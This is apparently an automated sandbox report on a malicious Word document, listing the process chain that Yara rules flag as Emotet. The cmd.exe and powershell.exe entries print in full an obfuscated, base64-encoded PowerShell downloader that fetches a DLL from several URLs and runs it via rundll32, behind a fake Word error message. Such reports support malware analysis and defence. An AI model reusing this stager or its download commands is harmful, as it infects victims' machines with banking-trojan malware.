Feb 17, 2021 22:56:46.658565044 CET	19	IN	Data Raw: 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 Data Ascii: `+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1796 Parent PID: 584

General

Start time:	22:56:32
Start date:	17/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f940000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1084 Parent PID: 1220

General

Start time:	22:56:34
Start date:	17/02/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
Imagebase:	0x4a770000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 592 Parent PID: 1084

General

Start time:	22:56:35
Start date:	17/02/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff770000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1320 Parent PID: 1084

General

Start time:	22:56:35
Start date:	17/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
Imagebase:	0x13f070000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2416 Parent PID: 1320

General

Start time:	22:56:45
Start date:	17/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Imagebase:	0xff830000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2296 Parent PID: 2416

General

Start time:	22:56:45
Start date:	17/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Imagebase:	0xa10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2700 Parent PID: 2296

General

Start time:	22:56:51
Start date:	17/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Imagebase:	0xa10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2824 Parent PID: 2700

General

Start time:	22:56:56
Start date:	17/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
Imagebase:	0xa10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2844 Parent PID: 2824

General

Start time:	22:57:01
Start date:	17/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
Imagebase:	0xa10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2460 Parent PID: 2844

General

Start time:	22:57:07
Start date:	17/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
Imagebase:	0xa10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2448 Parent PID: 2460

General

Start time:	22:57:12
Start date:	17/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
Imagebase:	0xa10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
